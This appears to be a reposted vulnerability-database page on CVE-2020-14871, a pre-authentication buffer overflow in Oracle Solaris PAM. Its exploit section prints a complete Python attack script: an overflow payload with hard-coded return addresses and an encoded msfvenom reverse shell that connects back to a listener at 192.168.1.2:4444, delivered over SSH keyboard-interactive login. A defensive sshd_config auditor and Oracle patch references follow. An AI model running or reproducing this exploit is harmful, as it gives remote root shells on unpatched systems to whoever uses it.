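Oracle Solaris Security Vulnerability
Vulnerability ID | 2202644 | Vulnerability type | Buffer error |
Published | 2021-05-22 | Updated | 2021-06-24 |
CVE ID | CVE-2020-14871 | CNNVD-ID | CNNVD-202010-918 |
Affected platform | N/A | CVSS score | N/A |
|Vulnerability source
|Vulnerability details
Oracle Solaris is a UNIX operating system from Oracle Corporation (USA). A security vulnerability exists in the Pluggable Authentication Module of Oracle Solaris versions 10 and 11. It allows an unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. Although the vulnerability is in Oracle Solaris, attacks may significantly impact other products.
|Vulnerability EXP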
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""
# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
payload+=b"\""
print("Length => %d" % (len(payload)))
def inter_handler(title, instructions, prompt_list):
resp = [] #Initialize the response container
for pr in prompt_list:
print(pr)
if pr[0].startswith('Please enter user name:'):
sleep(10)
resp.append(payload)
print("Your payload is sended check your nc")
return tuple(resp)
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.2", 22))
ts = paramiko.Transport(sock)
ts.start_client(timeout=10)
ts.auth_interactive(username="", handler=inter_handler)
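The PoC above reaches the PAM code through SSH keyboard-interactive authentication (`auth_interactive`), so besides applying the October 2020 Critical Patch Update, a defender will want to know whether that authentication method is still enabled in `sshd_config`. The following auditor is an added example, not part of the original page or of any Oracle tooling. It assumes OpenSSH-style directive names, first-value-wins parsing, and that an unset directive means the method is enabled; the sample configs are constructed.

```python
import re

# Directives the workaround sets to "no" (OpenSSH-style names, assumed here).
DIRECTIVES = ("challengeresponseauthentication", "kbdinteractiveauthentication")

# Constructed sample configs, not taken from any real host.
EXPOSED = """Port 22
#KbdInteractiveAuthentication no
ChallengeResponseAuthentication yes
"""
HARDENED = """ChallengeResponseAuthentication no
KbdInteractiveAuthentication no
KbdInteractiveAuthentication yes
"""


def effective_settings(config_text):
    """Return the first global value of each audited directive."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()  # keywords are case-insensitive
        if key == "match":
            break  # only the global section is audited
        if key in DIRECTIVES and key not in seen and len(parts) == 2:
            seen[key] = parts[1].strip().strip('"').lower()
    return seen


def audit(config_text):
    """Return findings; an empty list means keyboard-interactive is disabled."""
    settings = effective_settings(config_text)
    findings = []
    for name in DIRECTIVES:
        value = settings.get(name)
        if value is None:
            findings.append(f"{name}: not set, treated as enabled (assumption)")
        elif value != "no":
            findings.append(f"{name}: set to {value!r}")
    return findings


if __name__ == "__main__":
    for label, text in (("EXPOSED", EXPOSED), ("HARDENED", HARDENED)):
        print(label, audit(text) or "keyboard-interactive disabled")
```

A clean result only shows the SSH path to the PAM code is closed; other PAM-backed services on the host still need the vendor patch.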
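|References
Source: www.oracle.com
Link: https://www.oracle.com/security-alerts/cpuoct2020.html
This article was originally written by 华域联盟: 华域联盟 » Oracle Solaris Security Vulnerability
When reposting, please keep the source and the original link: https://www.cnhackhy.com/95757.htm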